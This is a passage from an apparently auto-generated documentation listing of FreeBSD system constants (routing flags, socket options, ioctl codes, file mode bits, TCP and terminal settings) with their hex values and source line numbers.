0x4000 constant RTF_PROTO3 (line 1308) | RTF_PROTO3 = 0x40000 constant RTF_REJECT (line 1309) | RTF_REJECT = 0x8 constant RTF_RNH_LOCKED (line 1310) | RTF_RNH_LOCKED = 0x40000000 constant RTF_STATIC (line 1311) | RTF_STATIC = 0x800 constant RTF_STICKY (line 1312) | RTF_STICKY = 0x10000000 constant RTF_UP (line 1313) | RTF_UP = 0x1 constant RTF_XRESOLVE (line 1314) | RTF_XRESOLVE = 0x200 constant RTM_ADD (line 1315) | RTM_ADD = 0x1 constant RTM_CHANGE (line 1316) | RTM_CHANGE = 0x3 constant RTM_DELADDR (line 1317) | RTM_DELADDR = 0xd constant RTM_DELETE (line 1318) | RTM_DELETE = 0x2 constant RTM_DELMADDR (line 1319) | RTM_DELMADDR = 0x10 constant RTM_GET (line 1320) | RTM_GET = 0x4 constant RTM_IEEE80211 (line 1321) | RTM_IEEE80211 = 0x12 constant RTM_IFANNOUNCE (line 1322) | RTM_IFANNOUNCE = 0x11 constant RTM_IFINFO (line 1323) | RTM_IFINFO = 0xe constant RTM_LOCK (line 1324) | RTM_LOCK = 0x8 constant RTM_LOSING (line 1325) | RTM_LOSING = 0x5 constant RTM_MISS (line 1326) | RTM_MISS = 0x7 constant RTM_NEWADDR (line 1327) | RTM_NEWADDR = 0xc constant RTM_NEWMADDR (line 1328) | RTM_NEWMADDR = 0xf constant RTM_REDIRECT (line 1329) | RTM_REDIRECT = 0x6 constant RTM_RESOLVE (line 1330) | RTM_RESOLVE = 0xb constant RTM_RTTUNIT (line 1331) | RTM_RTTUNIT = 0xf4240 constant RTM_VERSION (line 1332) | RTM_VERSION = 0x5 constant RTV_EXPIRE (line 1333) | RTV_EXPIRE = 0x4 constant RTV_HOPCOUNT (line 1334) | RTV_HOPCOUNT = 0x2 constant RTV_MTU (line 1335) | RTV_MTU = 0x1 constant RTV_RPIPE (line 1336) | RTV_RPIPE = 0x8 constant RTV_RTT (line 1337) | RTV_RTT = 0x40 constant RTV_RTTVAR (line 1338) | RTV_RTTVAR = 0x80 constant RTV_SPIPE (line 1339) | RTV_SPIPE = 0x10 constant RTV_SSTHRESH (line 1340) | RTV_SSTHRESH = 0x20 constant RTV_WEIGHT (line 1341) | RTV_WEIGHT = 0x100 constant RT_ALL_FIBS (line 1342) | RT_ALL_FIBS = -0x1 constant RT_BLACKHOLE (line 1343) | RT_BLACKHOLE = 0x40 constant RT_DEFAULT_FIB (line 1344) | RT_DEFAULT_FIB = 0x0 constant RT_HAS_GW (line 1345) | RT_HAS_GW = 0x80 constant RT_HAS_HEADER (line 1346) | RT_HAS_HEADER = 0x10 constant RT_HAS_HEADER_BIT (line 1347) | RT_HAS_HEADER_BIT = 0x4 constant RT_L2_ME (line 1348) | RT_L2_ME = 0x4 constant RT_L2_ME_BIT (line 1349) | RT_L2_ME_BIT = 0x2 constant RT_LLE_CACHE (line 1350) | RT_LLE_CACHE = 0x100 constant RT_MAY_LOOP (line 1351) | RT_MAY_LOOP = 0x8 constant RT_MAY_LOOP_BIT (line 1352) | RT_MAY_LOOP_BIT = 0x3 constant RT_REJECT (line 1353) | RT_REJECT = 0x20 constant RUSAGE_CHILDREN (line 1354) | RUSAGE_CHILDREN = -0x1 constant RUSAGE_SELF (line 1355) | RUSAGE_SELF = 0x0 constant RUSAGE_THREAD (line 1356) | RUSAGE_THREAD = 0x1 constant SCM_BINTIME (line 1357) | SCM_BINTIME = 0x4 constant SCM_CREDS (line 1358) | SCM_CREDS = 0x3 constant SCM_MONOTONIC (line 1359) | SCM_MONOTONIC = 0x6 constant SCM_REALTIME (line 1360) | SCM_REALTIME = 0x5 constant SCM_RIGHTS (line 1361) | SCM_RIGHTS = 0x1 constant SCM_TIMESTAMP (line 1362) | SCM_TIMESTAMP = 0x2 constant SCM_TIME_INFO (line 1363) | SCM_TIME_INFO = 0x7 constant SEEK_CUR (line 1364) | SEEK_CUR = 0x1 constant SEEK_DATA (line 1365) | SEEK_DATA = 0x3 constant SEEK_END (line 1366) | SEEK_END = 0x2 constant SEEK_HOLE (line 1367) | SEEK_HOLE = 0x4 constant SEEK_SET (line 1368) | SEEK_SET = 0x0 constant SHUT_RD (line 1369) | SHUT_RD = 0x0 constant SHUT_RDWR (line 1370) | SHUT_RDWR = 0x2 constant SHUT_WR (line 1371) | SHUT_WR = 0x1 constant SIOCADDMULTI (line 1372) | SIOCADDMULTI = 0x80206931 constant SIOCAIFADDR (line 1373) | SIOCAIFADDR = 0x8040691a constant SIOCAIFGROUP (line 1374) | SIOCAIFGROUP = 0x80286987 constant SIOCATMARK (line 1375) | SIOCATMARK = 0x40047307 constant SIOCDELMULTI (line 1376) | SIOCDELMULTI = 0x80206932 constant SIOCDIFADDR (line 1377) | SIOCDIFADDR = 0x80206919 constant SIOCDIFGROUP (line 1378) | SIOCDIFGROUP = 0x80286989 constant SIOCDIFPHYADDR (line 1379) | SIOCDIFPHYADDR = 0x80206949 constant SIOCGDRVSPEC (line 1380) | SIOCGDRVSPEC = 0xc028697b constant SIOCGETSGCNT (line 1381) | SIOCGETSGCNT = 0xc0207210 constant SIOCGETVIFCNT (line 1382) | SIOCGETVIFCNT = 0xc028720f constant SIOCGHIWAT (line 1383) | SIOCGHIWAT = 0x40047301 constant SIOCGHWADDR (line 1384) | SIOCGHWADDR = 0xc020693e constant SIOCGI2C (line 1385) | SIOCGI2C = 0xc020693d constant SIOCGIFADDR (line 1386) | SIOCGIFADDR = 0xc0206921 constant SIOCGIFALIAS (line 1387) | SIOCGIFALIAS = 0xc044692d constant SIOCGIFBRDADDR (line 1388) | SIOCGIFBRDADDR = 0xc0206923 constant SIOCGIFCAP (line 1389) | SIOCGIFCAP = 0xc020691f constant SIOCGIFCONF (line 1390) | SIOCGIFCONF = 0xc0106924 constant SIOCGIFDESCR (line 1391) | SIOCGIFDESCR = 0xc020692a constant SIOCGIFDOWNREASON (line 1392) | SIOCGIFDOWNREASON = 0xc058699a constant SIOCGIFDSTADDR (line 1393) | SIOCGIFDSTADDR = 0xc0206922 constant SIOCGIFFIB (line 1394) | SIOCGIFFIB = 0xc020695c constant SIOCGIFFLAGS (line 1395) | SIOCGIFFLAGS = 0xc0206911 constant SIOCGIFGENERIC (line 1396) | SIOCGIFGENERIC = 0xc020693a constant SIOCGIFGMEMB (line 1397) | SIOCGIFGMEMB = 0xc028698a constant SIOCGIFGROUP (line 1398) | SIOCGIFGROUP = 0xc0286988 constant SIOCGIFINDEX (line 1399) | SIOCGIFINDEX = 0xc0206920 constant SIOCGIFMAC (line 1400) | SIOCGIFMAC = 0xc0206926 constant SIOCGIFMEDIA (line 1401) | SIOCGIFMEDIA = 0xc0306938 constant SIOCGIFMETRIC (line 1402) | SIOCGIFMETRIC = 0xc0206917 constant SIOCGIFMTU (line 1403) | SIOCGIFMTU = 0xc0206933 constant SIOCGIFNETMASK (line 1404) | SIOCGIFNETMASK = 0xc0206925 constant SIOCGIFPDSTADDR (line 1405) | SIOCGIFPDSTADDR = 0xc0206948 constant SIOCGIFPHYS (line 1406) | SIOCGIFPHYS = 0xc0206935 constant SIOCGIFPSRCADDR (line 1407) | SIOCGIFPSRCADDR = 0xc0206947 constant SIOCGIFRSSHASH (line 1408) | SIOCGIFRSSHASH = 0xc0186997 constant SIOCGIFRSSKEY (line 1409) | SIOCGIFRSSKEY = 0xc0946996 constant SIOCGIFSTATUS (line 1410) | SIOCGIFSTATUS = 0xc331693b constant SIOCGIFXMEDIA (line 1411) | SIOCGIFXMEDIA = 0xc030698b constant SIOCGLANPCP (line 1412) | SIOCGLANPCP = 0xc0206998 constant SIOCGLOWAT (line 1413) | SIOCGLOWAT = 0x40047303 constant SIOCGPGRP (line 1414) | SIOCGPGRP = 0x40047309 constant SIOCGPRIVATE_0 (line 1415) | SIOCGPRIVATE_0 = 0xc0206950 constant SIOCGPRIVATE_1 (line 1416) | SIOCGPRIVATE_1 = 0xc0206951 constant SIOCGTUNFIB (line 1417) | SIOCGTUNFIB = 0xc020695e constant SIOCIFCREATE (line 1418) | SIOCIFCREATE = 0xc020697a constant SIOCIFCREATE2 (line 1419) | SIOCIFCREATE2 = 0xc020697c constant SIOCIFDESTROY (line 1420) | SIOCIFDESTROY = 0x80206979 constant SIOCIFGCLONERS (line 1421) | SIOCIFGCLONERS = 0xc0106978 constant SIOCSDRVSPEC (line 1422) | SIOCSDRVSPEC = 0x8028697b constant SIOCSHIWAT (line 1423) | SIOCSHIWAT = 0x80047300 constant SIOCSIFADDR (line 1424) | SIOCSIFADDR = 0x8020690c constant SIOCSIFBRDADDR (line 1425) | SIOCSIFBRDADDR = 0x80206913 constant SIOCSIFCAP (line 1426) | SIOCSIFCAP = 0x8020691e constant SIOCSIFDESCR (line 1427) | SIOCSIFDESCR = 0x80206929 constant SIOCSIFDSTADDR (line 1428) | SIOCSIFDSTADDR = 0x8020690e constant SIOCSIFFIB (line 1429) | SIOCSIFFIB = 0x8020695d constant SIOCSIFFLAGS (line 1430) | SIOCSIFFLAGS = 0x80206910 constant SIOCSIFGENERIC (line 1431) | SIOCSIFGENERIC = 0x80206939 constant SIOCSIFLLADDR (line 1432) | SIOCSIFLLADDR = 0x8020693c constant SIOCSIFMAC (line 1433) | SIOCSIFMAC = 0x80206927 constant SIOCSIFMEDIA (line 1434) | SIOCSIFMEDIA = 0xc0206937 constant SIOCSIFMETRIC (line 1435) | SIOCSIFMETRIC = 0x80206918 constant SIOCSIFMTU (line 1436) | SIOCSIFMTU = 0x80206934 constant SIOCSIFNAME (line 1437) | SIOCSIFNAME = 0x80206928 constant SIOCSIFNETMASK (line 1438) | SIOCSIFNETMASK = 0x80206916 constant SIOCSIFPHYADDR (line 1439) | SIOCSIFPHYADDR = 0x80406946 constant SIOCSIFPHYS (line 1440) | SIOCSIFPHYS = 0x80206936 constant SIOCSIFRVNET (line 1441) | SIOCSIFRVNET = 0xc020695b constant SIOCSIFVNET (line 1442) | SIOCSIFVNET = 0xc020695a constant SIOCSLANPCP (line 1443) | SIOCSLANPCP = 0x80206999 constant SIOCSLOWAT (line 1444) | SIOCSLOWAT = 0x80047302 constant SIOCSPGRP (line 1445) | SIOCSPGRP = 0x80047308 constant SIOCSTUNFIB (line 1446) | SIOCSTUNFIB = 0x8020695f constant SOCK_CLOEXEC (line 1447) | SOCK_CLOEXEC = 0x10000000 constant SOCK_DGRAM (line 1448) | SOCK_DGRAM = 0x2 constant SOCK_MAXADDRLEN (line 1449) | SOCK_MAXADDRLEN = 0xff constant SOCK_NONBLOCK (line 1450) | SOCK_NONBLOCK = 0x20000000 constant SOCK_RAW (line 1451) | SOCK_RAW = 0x3 constant SOCK_RDM (line 1452) | SOCK_RDM = 0x4 constant SOCK_SEQPACKET (line 1453) | SOCK_SEQPACKET = 0x5 constant SOCK_STREAM (line 1454) | SOCK_STREAM = 0x1 constant SOL_LOCAL (line 1455) | SOL_LOCAL = 0x0 constant SOL_SOCKET (line 1456) | SOL_SOCKET = 0xffff constant SOMAXCONN (line 1457) | SOMAXCONN = 0x80 constant SO_ACCEPTCONN (line 1458) | SO_ACCEPTCONN = 0x2 constant SO_ACCEPTFILTER (line 1459) | SO_ACCEPTFILTER = 0x1000 constant SO_BINTIME (line 1460) | SO_BINTIME = 0x2000 constant SO_BROADCAST (line 1461) | SO_BROADCAST = 0x20 constant SO_DEBUG (line 1462) | SO_DEBUG = 0x1 constant SO_DOMAIN (line 1463) | SO_DOMAIN = 0x1019 constant SO_DONTROUTE (line 1464) | SO_DONTROUTE = 0x10 constant SO_ERROR (line 1465) | SO_ERROR = 0x1007 constant SO_KEEPALIVE (line 1466) | SO_KEEPALIVE = 0x8 constant SO_LABEL (line 1467) | SO_LABEL = 0x1009 constant SO_LINGER (line 1468) | SO_LINGER = 0x80 constant SO_LISTENINCQLEN (line 1469) | SO_LISTENINCQLEN = 0x1013 constant SO_LISTENQLEN (line 1470) | SO_LISTENQLEN = 0x1012 constant SO_LISTENQLIMIT (line 1471) | SO_LISTENQLIMIT = 0x1011 constant SO_MAX_PACING_RATE (line 1472) | SO_MAX_PACING_RATE = 0x1018 constant SO_NOSIGPIPE (line 1473) | SO_NOSIGPIPE = 0x800 constant SO_NO_DDP (line 1474) | SO_NO_DDP = 0x8000 constant SO_NO_OFFLOAD (line 1475) | SO_NO_OFFLOAD = 0x4000 constant SO_OOBINLINE (line 1476) | SO_OOBINLINE = 0x100 constant SO_PEERLABEL (line 1477) | SO_PEERLABEL = 0x1010 constant SO_PROTOCOL (line 1478) | SO_PROTOCOL = 0x1016 constant SO_PROTOTYPE (line 1479) | SO_PROTOTYPE = 0x1016 constant SO_RCVBUF (line 1480) | SO_RCVBUF = 0x1002 constant SO_RCVLOWAT (line 1481) | SO_RCVLOWAT = 0x1004 constant SO_RCVTIMEO (line 1482) | SO_RCVTIMEO = 0x1006 constant SO_RERROR (line 1483) | SO_RERROR = 0x20000 constant SO_REUSEADDR (line 1484) | SO_REUSEADDR = 0x4 constant SO_REUSEPORT (line 1485) | SO_REUSEPORT = 0x200 constant SO_REUSEPORT_LB (line 1486) | SO_REUSEPORT_LB = 0x10000 constant SO_SETFIB (line 1487) | SO_SETFIB = 0x1014 constant SO_SNDBUF (line 1488) | SO_SNDBUF = 0x1001 constant SO_SNDLOWAT (line 1489) | SO_SNDLOWAT = 0x1003 constant SO_SNDTIMEO (line 1490) | SO_SNDTIMEO = 0x1005 constant SO_TIMESTAMP (line 1491) | SO_TIMESTAMP = 0x400 constant SO_TS_BINTIME (line 1492) | SO_TS_BINTIME = 0x1 constant SO_TS_CLOCK (line 1493) | SO_TS_CLOCK = 0x1017 constant SO_TS_CLOCK_MAX (line 1494) | SO_TS_CLOCK_MAX = 0x3 constant SO_TS_DEFAULT (line 1495) | SO_TS_DEFAULT = 0x0 constant SO_TS_MONOTONIC (line 1496) | SO_TS_MONOTONIC = 0x3 constant SO_TS_REALTIME (line 1497) | SO_TS_REALTIME = 0x2 constant SO_TS_REALTIME_MICRO (line 1498) | SO_TS_REALTIME_MICRO = 0x0 constant SO_TYPE (line 1499) | SO_TYPE = 0x1008 constant SO_USELOOPBACK (line 1500) | SO_USELOOPBACK = 0x40 constant SO_USER_COOKIE (line 1501) | SO_USER_COOKIE = 0x1015 constant SO_VENDOR (line 1502) | SO_VENDOR = 0x80000000 constant S_BLKSIZE (line 1503) | S_BLKSIZE = 0x200 constant S_IEXEC (line 1504) | S_IEXEC = 0x40 constant S_IFBLK (line 1505) | S_IFBLK = 0x6000 constant S_IFCHR (line 1506) | S_IFCHR = 0x2000 constant S_IFDIR (line 1507) | S_IFDIR = 0x4000 constant S_IFIFO (line 1508) | S_IFIFO = 0x1000 constant S_IFLNK (line 1509) | S_IFLNK = 0xa000 constant S_IFMT (line 1510) | S_IFMT = 0xf000 constant S_IFREG (line 1511) | S_IFREG = 0x8000 constant S_IFSOCK (line 1512) | S_IFSOCK = 0xc000 constant S_IFWHT (line 1513) | S_IFWHT = 0xe000 constant S_IREAD (line 1514) | S_IREAD = 0x100 constant S_IRGRP (line 1515) | S_IRGRP = 0x20 constant S_IROTH (line 1516) | S_IROTH = 0x4 constant S_IRUSR (line 1517) | S_IRUSR = 0x100 constant S_IRWXG (line 1518) | S_IRWXG = 0x38 constant S_IRWXO (line 1519) | S_IRWXO = 0x7 constant S_IRWXU (line 1520) | S_IRWXU = 0x1c0 constant S_ISGID (line 1521) | S_ISGID = 0x400 constant S_ISTXT (line 1522) | S_ISTXT = 0x200 constant S_ISUID (line 1523) | S_ISUID = 0x800 constant S_ISVTX (line 1524) | S_ISVTX = 0x200 constant S_IWGRP (line 1525) | S_IWGRP = 0x10 constant S_IWOTH (line 1526) | S_IWOTH = 0x2 constant S_IWRITE (line 1527) | S_IWRITE = 0x80 constant S_IWUSR (line 1528) | S_IWUSR = 0x80 constant S_IXGRP (line 1529) | S_IXGRP = 0x8 constant S_IXOTH (line 1530) | S_IXOTH = 0x1 constant S_IXUSR (line 1531) | S_IXUSR = 0x40 constant TAB0 (line 1532) | TAB0 = 0x0 constant TAB3 (line 1533) | TAB3 = 0x4 constant TABDLY (line 1534) | TABDLY = 0x4 constant TCIFLUSH (line 1535) | TCIFLUSH = 0x1 constant TCIOFF (line 1536) | TCIOFF = 0x3 constant TCIOFLUSH (line 1537) | TCIOFLUSH = 0x3 constant TCION (line 1538) | TCION = 0x4 constant TCOFLUSH (line 1539) | TCOFLUSH = 0x2 constant TCOOFF (line 1540) | TCOOFF = 0x1 constant TCOON (line 1541) | TCOON = 0x2 constant TCPOPT_EOL (line 1542) | TCPOPT_EOL = 0x0 constant TCPOPT_FAST_OPEN (line 1543) | TCPOPT_FAST_OPEN = 0x22 constant TCPOPT_MAXSEG (line 1544) | TCPOPT_MAXSEG = 0x2 constant TCPOPT_NOP (line 1545) | TCPOPT_NOP = 0x1 constant TCPOPT_PAD (line 1546) | TCPOPT_PAD = 0x0 constant TCPOPT_SACK (line 1547) | TCPOPT_SACK = 0x5 constant TCPOPT_SACK_PERMITTED (line 1548) | TCPOPT_SACK_PERMITTED = 0x4 constant TCPOPT_SIGNATURE (line 1549) | TCPOPT_SIGNATURE = 0x13 constant TCPOPT_TIMESTAMP (line 1550) | TCPOPT_TIMESTAMP = 0x8 constant TCPOPT_WINDOW (line 1551) | TCPOPT_WINDOW = 0x3 constant TCP_BBR_ACK_COMP_ALG (line 1552) | TCP_BBR_ACK_COMP_ALG = 0x448 constant TCP_BBR_ALGORITHM (line 1553) | TCP_BBR_ALGORITHM = 0x43b constant TCP_BBR_DRAIN_INC_EXTRA (line 1554) | TCP_BBR_DRAIN_INC_EXTRA = 0x43c constant TCP_BBR_DRAIN_PG (line 1555) | TCP_BBR_DRAIN_PG = 0x42e constant TCP_BBR_EXTRA_GAIN (line 1556) | TCP_BBR_EXTRA_GAIN = 0x449 constant TCP_BBR_EXTRA_STATE (line 1557) | TCP_BBR_EXTRA_STATE = 0x453 constant TCP_BBR_FLOOR_MIN_TSO (line 1558) | TCP_BBR_FLOOR_MIN_TSO = 0x454 constant TCP_BBR_HDWR_PACE (line 1559) | TCP_BBR_HDWR_PACE = 0x451 constant TCP_BBR_HOLD_TARGET (line 1560) | TCP_BBR_HOLD_TARGET = 0x436 constant TCP_BBR_IWINTSO (line 1561) | TCP_BBR_IWINTSO = 0x42b constant TCP_BBR_LOWGAIN_FD (line 1562) | TCP_BBR_LOWGAIN_FD = 0x436 constant TCP_BBR_LOWGAIN_HALF (line 1563) | TCP_BBR_LOWGAIN_HALF = 0x435 constant TCP_BBR_LOWGAIN_THRESH (line 1564) | TCP_BBR_LOWGAIN_THRESH = 0x434 constant TCP_BBR_MAX_RTO (line 1565) | TCP_BBR_MAX_RTO = 0x439 constant TCP_BBR_MIN_RTO (line 1566) | TCP_BBR_MIN_RTO = 0x438 constant TCP_BBR_MIN_TOPACEOUT (line 1567) | TCP_BBR_MIN_TOPACEOUT = 0x455 constant TCP_BBR_ONE_RETRAN (line 1568) | TCP_BBR_ONE_RETRAN = 0x431 constant TCP_BBR_PACE_CROSS (line 1569) | TCP_BBR_PACE_CROSS = 0x442 constant TCP_BBR_PACE_DEL_TAR (line 1570) | TCP_BBR_PACE_DEL_TAR = 0x43f constant TCP_BBR_PACE_OH (line 1571) | TCP_BBR_PACE_OH = 0x435 constant TCP_BBR_PACE_PER_SEC (line 1572) | TCP_BBR_PACE_PER_SEC = 0x43e constant TCP_BBR_PACE_SEG_MAX (line 1573) | TCP_BBR_PACE_SEG_MAX = 0x440 constant TCP_BBR_PACE_SEG_MIN (line 1574) | TCP_BBR_PACE_SEG_MIN = 0x441 constant TCP_BBR_POLICER_DETECT (line 1575) | TCP_BBR_POLICER_DETECT = 0x457 constant TCP_BBR_PROBE_RTT_GAIN (line 1576) | TCP_BBR_PROBE_RTT_GAIN = 0x44d constant TCP_BBR_PROBE_RTT_INT (line 1577) | TCP_BBR_PROBE_RTT_INT = 0x430 constant TCP_BBR_PROBE_RTT_LEN (line 1578) | TCP_BBR_PROBE_RTT_LEN = 0x44e constant TCP_BBR_RACK_RTT_USE (line 1579) | TCP_BBR_RACK_RTT_USE = 0x44a constant TCP_BBR_RECFORCE (line 1580) | TCP_BBR_RECFORCE = 0x42c constant TCP_BBR_REC_OVER_HPTS (line 1581) | TCP_BBR_REC_OVER_HPTS = 0x43a constant TCP_BBR_RETRAN_WTSO (line 1582) | TCP_BBR_RETRAN_WTSO = 0x44b constant TCP_BBR_RWND_IS_APP (line 1583) | TCP_BBR_RWND_IS_APP = 0x42f constant TCP_BBR_SEND_IWND_IN_TSO (line 1584) | TCP_BBR_SEND_IWND_IN_TSO = 0x44f constant TCP_BBR_STARTUP_EXIT_EPOCH (line 1585) | TCP_BBR_STARTUP_EXIT_EPOCH = 0x43d constant TCP_BBR_STARTUP_LOSS_EXIT (line 1586) | TCP_BBR_STARTUP_LOSS_EXIT = 0x432 constant TCP_BBR_STARTUP_PG (line 1587) | TCP_BBR_STARTUP_PG = 0x42d constant TCP_BBR_TMR_PACE_OH (line 1588) | TCP_BBR_TMR_PACE_OH = 0x448 constant TCP_BBR_TSLIMITS (line 1589) | TCP_BBR_TSLIMITS = 0x434 constant TCP_BBR_TSTMP_RAISES (line 1590) | TCP_BBR_TSTMP_RAISES = 0x456 constant TCP_BBR_UNLIMITED (line 1591) | TCP_BBR_UNLIMITED = 0x43b constant TCP_BBR_USEDEL_RATE (line 1592) | TCP_BBR_USEDEL_RATE = 0x437 constant TCP_BBR_USE_LOWGAIN (line 1593) | TCP_BBR_USE_LOWGAIN = 0x433 constant TCP_BBR_USE_RACK_CHEAT (line 1594) | TCP_BBR_USE_RACK_CHEAT = 0x450 constant TCP_BBR_UTTER_MAX_TSO (line 1595) | TCP_BBR_UTTER_MAX_TSO = 0x452 constant TCP_CA_NAME_MAX (line 1596) | TCP_CA_NAME_MAX = 0x10 constant TCP_CCALGOOPT (line 1597) | TCP_CCALGOOPT = 0x41 constant TCP_CONGESTION (line 1598) | TCP_CONGESTION = 0x40 constant TCP_DATA_AFTER_CLOSE (line 1599) | TCP_DATA_AFTER_CLOSE = 0x44c constant TCP_DELACK (line 1600) | TCP_DELACK = 0x48 constant TCP_FASTOPEN (line 1601) | TCP_FASTOPEN = 0x401 constant TCP_FASTOPEN_MAX_COOKIE_LEN (line 1602) | TCP_FASTOPEN_MAX_COOKIE_LEN = 0x10 constant TCP_FASTOPEN_MIN_COOKIE_LEN (line 1603) | TCP_FASTOPEN_MIN_COOKIE_LEN = 0x4 constant TCP_FASTOPEN_PSK_LEN (line 1604) | TCP_FASTOPEN_PSK_LEN = 0x10 constant TCP_FUNCTION_BLK (line 1605) | TCP_FUNCTION_BLK = 0x2000 constant TCP_FUNCTION_NAME_LEN_MAX (line 1606) | TCP_FUNCTION_NAME_LEN_MAX = 0x20 constant TCP_INFO (line 1607) | TCP_INFO = 0x20 constant TCP_KEEPCNT (line 1608) | TCP_KEEPCNT = 0x400 constant TCP_KEEPIDLE (line 1609) | TCP_KEEPIDLE = 0x100 constant TCP_KEEPINIT (line 1610) | TCP_KEEPINIT = 0x80 constant TCP_KEEPINTVL (line 1611) | TCP_KEEPINTVL = 0x200 constant TCP_LOG (line 1612) | TCP_LOG = 0x22 constant TCP_LOGBUF (line 1613) | TCP_LOGBUF = 0x23 constant TCP_LOGDUMP (line 1614) | TCP_LOGDUMP = 0x25 constant TCP_LOGDUMPID (line 1615) | TCP_LOGDUMPID = 0x26 constant TCP_LOGID (line 1616) | TCP_LOGID = 0x24 constant TCP_LOG_ID_LEN (line 1617) | TCP_LOG_ID_LEN = 0x40 constant TCP_MAXBURST (line 1618) | TCP_MAXBURST = 0x4 constant TCP_MAXHLEN (line 1619) | TCP_MAXHLEN = 0x3c constant TCP_MAXOLEN (line 1620) | TCP_MAXOLEN = 0x28 constant TCP_MAXSEG (line 1621) | TCP_MAXSEG = 0x2 constant TCP_MAXWIN (line 1622) | TCP_MAXWIN = 0xffff constant TCP_MAX_SACK (line 1623) | TCP_MAX_SACK = 0x4 constant TCP_MAX_WINSHIFT (line 1624) | TCP_MAX_WINSHIFT = 0xe constant TCP_MD5SIG (line 1625) | TCP_MD5SIG = 0x10 constant TCP_MINMSS (line 1626) | TCP_MINMSS = 0xd8 constant TCP_MSS (line 1627) | TCP_MSS = 0x218 constant TCP_NODELAY (line 1628) | TCP_NODELAY = 0x1 constant TCP_NOOPT (line 1629) | TCP_NOOPT = 0x8 constant TCP_NOPUSH (line 1630) | TCP_NOPUSH = 0x4 constant TCP_PCAP_IN (line 1631) | TCP_PCAP_IN = 0x1000 constant TCP_PCAP_OUT (line 1632) | TCP_PCAP_OUT = 0x800 constant TCP_RACK_EARLY_RECOV (line 1633) | TCP_RACK_EARLY_RECOV = 0x423 constant TCP_RACK_EARLY_SEG (line 1634) | TCP_RACK_EARLY_SEG = 0x424 constant TCP_RACK_GP_INCREASE (line 1635) | TCP_RACK_GP_INCREASE = 0x446 constant TCP_RACK_IDLE_REDUCE_HIGH (line 1636) | TCP_RACK_IDLE_REDUCE_HIGH = 0x444 constant TCP_RACK_MIN_PACE (line 1637) | TCP_RACK_MIN_PACE = 0x445 constant TCP_RACK_MIN_PACE_SEG (line 1638) | TCP_RACK_MIN_PACE_SEG = 0x446 constant TCP_RACK_MIN_TO (line 1639) | TCP_RACK_MIN_TO = 0x422 constant TCP_RACK_PACE_ALWAYS (line 1640) | TCP_RACK_PACE_ALWAYS = 0x41f constant TCP_RACK_PACE_MAX_SEG (line 1641) | TCP_RACK_PACE_MAX_SEG = 0x41e constant TCP_RACK_PACE_REDUCE (line 1642) | TCP_RACK_PACE_REDUCE = 0x41d constant TCP_RACK_PKT_DELAY (line 1643) | TCP_RACK_PKT_DELAY = 0x428 constant TCP_RACK_PROP (line 1644) | TCP_RACK_PROP = 0x41b constant TCP_RACK_PROP_RATE (line 1645) | TCP_RACK_PROP_RATE = 0x420 constant TCP_RACK_PRR_SENDALOT (line 1646) | TCP_RACK_PRR_SENDALOT = 0x421 constant TCP_RACK_REORD_FADE (line 1647) | TCP_RACK_REORD_FADE = 0x426 constant TCP_RACK_REORD_THRESH (line 1648) | TCP_RACK_REORD_THRESH = 0x425 constant TCP_RACK_TLP_INC_VAR (line 1649) | TCP_RACK_TLP_INC_VAR = 0x429 constant TCP_RACK_TLP_REDUCE (line 1650) | TCP_RACK_TLP_REDUCE = 0x41c constant TCP_RACK_TLP_THRESH (line 1651) | TCP_RACK_TLP_THRESH = 0x427 constant TCP_RACK_TLP_USE (line 1652) | TCP_RACK_TLP_USE = 0x447 constant TCP_VENDOR (line 1653) | TCP_VENDOR = 0x80000000 constant TCSAFLUSH (line 1654) | TCSAFLUSH = 0x2 constant TIMER_ABSTIME (line 1655) | TIMER_ABSTIME = 0x1 constant TIMER_RELTIME (line 1656) | TIMER_RELTIME = 0x0 constant TIOCCBRK (line 1657) | TIOCCBRK = 0x2000747a constant TIOCCDTR (line 1658) | TIOCCDTR = 0x20007478 constant TIOCCONS (line 1659) | TIOCCONS = 0x80047462 constant TIOCDRAIN (line 1660) | TIOCDRAIN = 0x2000745e constant TIOCEXCL (line 1661) | TIOCEXCL = 0x2000740d constant TIOCEXT (line 1662) | TIOCEXT = 0x80047460 constant TIOCFLUSH (line 1663) | TIOCFLUSH = 0x80047410 constant TIOCGDRAINWAIT (line 1664) | TIOCGDRAINWAIT = 0x40047456 constant TIOCGETA (line 1665) | TIOCGETA = 0x402c7413 constant TIOCGETD (line 1666) | TIOCGETD = 0x4004741a constant TIOCGPGRP (line 1667) | TIOCGPGRP = 0x40047477 constant TIOCGPTN (line 1668) | TIOCGPTN = 0x4004740f constant TIOCGSID (line 1669) | TIOCGSID = 0x40047463 constant TIOCGWINSZ (line 1670) | TIOCGWINSZ = 0x40087468 constant TIOCMBIC (line 1671) | TIOCMBIC = 0x8004746b constant TIOCMBIS (line 1672) | TIOCMBIS = 0x8004746c constant TIOCMGDTRWAIT (line 1673) | TIOCMGDTRWAIT = 0x4004745a constant TIOCMGET (line 1674) | TIOCMGET = 0x4004746a constant TIOCMSDTRWAIT (line 1675) | TIOCMSDTRWAIT = 0x8004745b constant TIOCMSET (line 1676) | TIOCMSET = 0x8004746d constant TIOCM_CAR (line 1677) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 1678) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 1679) | TIOCM_CTS = 0x20 constant TIOCM_DCD (line 1680) | TIOCM_DCD = 0x40 constant TIOCM_DSR (line 1681) | TIOCM_DSR = 0x100 constant TIOCM_DTR (line 1682) | TIOCM_DTR = 0x2 constant TIOCM_LE (line 1683) | TIOCM_LE = 0x1 constant TIOCM_RI (line 1684) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 1685) | TIOCM_RNG = 0x80 constant TIOCM_RTS (line 1686) | TIOCM_RTS = 0x4 constant TIOCM_SR (line 1687) | TIOCM_SR = 0x10 constant TIOCM_ST (line 1688) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 1689) | TIOCNOTTY = 0x20007471 constant TIOCNXCL (line 1690) | TIOCNXCL = 0x2000740e constant TIOCOUTQ (line 1691) | TIOCOUTQ = 0x40047473 constant TIOCPKT (line 1692) | TIOCPKT = 0x80047470 constant TIOCPKT_DATA (line 1693) | TIOCPKT_DATA = 0x0 constant TIOCPKT_DOSTOP (line 1694) | TIOCPKT_DOSTOP = 0x20 constant TIOCPKT_FLUSHREAD (line 1695) | TIOCPKT_FLUSHREAD = 0x1 constant TIOCPKT_FLUSHWRITE (line 1696) | TIOCPKT_FLUSHWRITE = 0x2 constant TIOCPKT_IOCTL (line 1697) | TIOCPKT_IOCTL = 0x40 constant TIOCPKT_NOSTOP (line 1698) | TIOCPKT_NOSTOP = 0x10 constant 